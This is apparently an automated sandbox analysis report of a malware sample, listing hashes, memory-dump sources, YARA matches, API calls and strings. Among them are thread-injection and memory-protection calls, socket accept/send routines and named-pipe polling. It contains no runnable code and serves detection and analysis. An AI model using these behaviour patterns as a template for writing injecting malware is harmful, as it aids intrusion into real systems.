                                                                  • API String ID: 1696598829-0
                                                                  • Opcode ID: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
                                                                  • Instruction ID: e627948beb357ee2bb31f114f1c75fea06d1104a764745ae6f779f223a188730
                                                                  • Opcode Fuzzy Hash: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
                                                                  • Instruction Fuzzy Hash: B9218434628F0E4FC749F76CB46436DB2E1FBD8254F44066EA84EC72A4ED38E9018386
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
                                                                  • Instruction ID: a9db3b848d30421860ae17c58a2385a6443a9f5edc4f11e1185aa6785593b3b6
                                                                  • Opcode Fuzzy Hash: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
                                                                  • Instruction Fuzzy Hash: 0531E12A71A65083FF3CAB2DF8803793366FB94B94F444516ED8A07266CF3CC8429790
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$Free$DestroyFileHeapQueryUnmapView
                                                                  • String ID:
                                                                  • API String ID: 4268163748-0
                                                                  • Opcode ID: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
                                                                  • Instruction ID: 1fd430c47d9598658c97c40e3bea241410fa810d2a8eb7a32a18285d126aefd8
                                                                  • Opcode Fuzzy Hash: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
                                                                  • Instruction Fuzzy Hash: 07119632718A0092EE748B55FD4136EB368F786B94F588921EE4E57624DF3DCA42CB80
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 035657F0
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 035657E8
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction ID: bfe1dac9a4eb7fbaa7f1939a07c93c1b106b03531c1c3dc1f547110c9f61cf25
                                                                  • Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction Fuzzy Hash: DFF0F4301A4A4E8EC346E764DCA035832B0FF52325FA54B55E816CF5F0E77C2441C352
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B63A9
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B63A1
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction ID: 8a95e7c0eed802c01816d851685dc41982dee4beb8fe93b1bd34c439bd2cda32
                                                                  • Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction Fuzzy Hash: E3F0F0B270AA0489EB062F54CAC13AC36919BD1B71F954701E62F073E2C77C9442CA32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s!%s
                                                                  • API String ID: 0-2935588013
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AccountInformationLookupToken_snprintf
                                                                  • String ID: %s\%s
                                                                  • API String ID: 2107350476-4073750446
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009AB851
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AB85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B$x86
                                                                  • API String ID: 1812809483-1233573079
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlCreateUserThread$ntdll.dll
                                                                  • API String ID: 1646373207-2935400652
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 1646373207-3789238822
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-3900151262
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-736604160
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0355A54E
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0355A55C
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • malloc.LIBCMT ref: 0355A57E
                                                                  • _snprintf.LIBCMT ref: 0355A599
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • malloc.LIBCMT ref: 0355A5B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                  • String ID:
                                                                  • API String ID: 2026495703-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 634798775-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0356A943
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0356A94F
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0356A95A
                                                                  • strchr.LIBCMT ref: 0356A970
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  APIs
                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0355B4F0
                                                                    • Part of subcall function 0355F727: _FindPESection.LIBCMT ref: 0355F750
                                                                  • _initp_misc_cfltcvt_tab.LIBCMT ref: 0355B501
                                                                  • _initterm_e.LIBCMT ref: 0355B514
                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0355B55D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                  • String ID:
                                                                  • API String ID: 1991439119-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BB4FC
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009BB508
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BB513
                                                                  • strchr.LIBCMT ref: 009BB529
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  APIs
                                                                    • Part of subcall function 0099D0D8: VirtualProtect.KERNEL32 ref: 0099D168
                                                                    • Part of subcall function 009AACF8: free.LIBCMT ref: 009AAD94
                                                                    • Part of subcall function 009AACF8: free.LIBCMT ref: 009AADA5
                                                                  • Sleep.KERNEL32 ref: 009AA367
                                                                  • ExitThread.KERNEL32 ref: 009AA371
                                                                  • CreateThread.KERNEL32 ref: 009AA396
                                                                  • ExitProcess.KERNEL32 ref: 009AA3B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitThreadfree$CreateProcessProtectSleepVirtual
                                                                  • String ID:
                                                                  • API String ID: 334832864-0
                                                                  APIs
                                                                  • accept.WS2_32 ref: 009AB069
                                                                  • send.WS2_32 ref: 009AB0A7
                                                                  • send.WS2_32 ref: 009AB0BB
                                                                  • closesocket.WS2_32 ref: 009AB0CC
                                                                    • Part of subcall function 009AB190: closesocket.WS2_32 ref: 009AB19C
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1A6
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1AF
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$closesocketsend$accept
                                                                  • String ID:
                                                                  • API String ID: 47150829-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  APIs
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 009A5D76
                                                                  • GetProcessHeap.KERNEL32 ref: 009A5D7C
                                                                  • HeapAlloc.KERNEL32 ref: 009A5D8C
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 009A5DA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1212816094-0
                                                                  APIs
                                                                  • closesocket.WS2_32 ref: 009AB19C
                                                                  • free.LIBCMT ref: 009AB1A6
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • free.LIBCMT ref: 009AB1AF
                                                                  • free.LIBCMT ref: 009AB1B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                                  • String ID:
                                                                  • API String ID: 1525665891-0
                                                                  Strings
                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 0-395989641
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_errno_getptdfree
                                                                  • String ID:
                                                                  • API String ID: 3172138858-0
                                                                  APIs
                                                                  Strings
                                                                  • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 1804819252-157664173
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0355AC98
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355ACA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B
                                                                  • API String ID: 1812809483-1255198513
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Unknown error, xrefs: 00401D2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  APIs
                                                                  Strings
                                                                  • Argument domain error (DOMAIN), xrefs: 00401CE0
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
